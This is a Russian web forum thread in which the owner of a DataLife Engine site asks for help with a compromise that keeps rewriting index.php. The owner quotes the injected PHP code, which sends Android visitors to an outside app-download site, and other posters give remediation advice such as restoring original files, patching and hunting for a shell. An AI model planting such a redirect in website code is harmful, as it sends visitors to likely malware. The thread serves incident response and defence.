Модификация файла index.php

[RUS_D 0]

На сайте http://stalker-worlds.ru/ происходит несанкционированная модификация index.php

Версия DLE 10, заплатка стоит

В файле сносится половина кода и вставляется такой код в самом верху

<?php

$ua = $_SERVER['HTTP_USER_AGENT'];

if(stripos("***$ua",'android') !== false){

header("Location: http://download-app.org/m/?mobile_version=stalker-worlds");

die();

}

?>

Соответственно видим пустой белый лист в Админку зайти могу.

Замена на оригинальный исправляет ситуацию минут на 10, потом тоже самое.

Атрибуты только чтения для файла толку не приносят.

Нашёл папку с двумя php файлами (вчера была создана) тогда же начались и проблемы - снёс. Но не помогло.

Больше изменённых файлов не нашёл

Где то есть дыра?

И идёт постоянная атака на админку - подбор паролей, уже заблокировал штук с 30 IP в .htaccess

[Captain 623]

admin.php не судьба переименовать? А также поставить заплатки для своей версии и заменить файлы дистрибутива на оригинальные? + купить лицензию, если этого ещё не сделали.

[RUS_D 0]

Лицензия куплена год назад (через полмесяца надо продлять), файлы все оригинальные, не считая подключенных модулей (фотокаталог и файловый каталог).

Переименовывание admin.php результата не давало

Правда не чистил кеш - может его снести вручную?

Изменено 7 октября 2014 пользователем RUS_D

[celsoft 6 072]

У вас на сервере находится шелл, или уязвимо серверное ПО, либо у вас украли ваши доступы к серверу.

Вам необходимо полностью восстановить оригинальные файлы скрипта на сервере, заменив их на файлы из оригинального дистрибутива. Если пользуетесь старыми версиями скрипта, то проверить и установить все патчи безопасности http://dle-news.ru/bags/ . Далее Вам необходимо проверить все свои сайты на вашем аккаунте на сервере, если у вас их несколько на наличие посторонних файлов. В DLE это можно сделать в админпанели антивирусом, и необходимо удалить все на что он укажет без исключения, в том числе и все сторонние модули если они есть. Далее сменить все пароли без исключения на доступ к серверу. Проверить свой компьютер антивирусами с последними обновлениями. Обратиться к хостинг провайдеру чтобы проверили входил ли кто на сервер по FTP или в панель управления хостингом не с вашего IP и соответственно ограничить доступ к вашему серверу по IP

[RUS_D 0]

Спасибо за совет. Пароли на FTP и вход на сервер сменил сразу , как и пароль до БД (использую VPS сервер)

Есть бекап сайта до возникновения проблем - сегодня скачаю проверю пофайлово.

Заплатки стоят.

По логу не вижу чтобы кто то входил - резвеч то гдето есть дыра в безопасности сервера.

Кстати ночью заменил на оригинал, выставил атрибуты только чтение - на утро файл опять модифицирован

Модули стоят только три - интеграция с IPB by kaliostro, фотокаталог и каталог файлов не может быть такого изза них? (нет статистики по безопасности этих модулей)

[celsoft 6 072]

Есть бекап сайта до возникновения проблем - сегодня скачаю проверю пофайлово.

Файлы нужно ставить оригинальные а не до возникновения проблем, внедрить вам код могли задолго, но не пользоваться им до определенного момента времени.

Модули стоят только три - интеграция с IPB by kaliostro, фотокаталог и каталог файлов не может быть такого изза них? (нет статистики по безопасности этих модулей)

Все может быть, я не могу поручится за их безопасность, потому как мне они неизвестны.

Кстати ночью заменил на оригинал, выставил атрибуты только чтение - на утро файл опять модифицирован

Если это было через шелл, то ваш сервер настроен небезопасно. Не используйте режми CGI и fast-cgi для PHP, т.к. без должной настройки по умолчанию они дают полный контроль над файловой системой для скриптов. Лучше использовать PHP как модуль Апача. Или корректно адаптировать сервер для режиме CGI и fast-cgi чтобы у них не было доступов.

На сервере также нужно обновлять все серверное ПО, потому как например уязвимости подобные этой http://habrahabr.ru/post/238021/ дают злоумышленникам полный контроль над вашим сервером.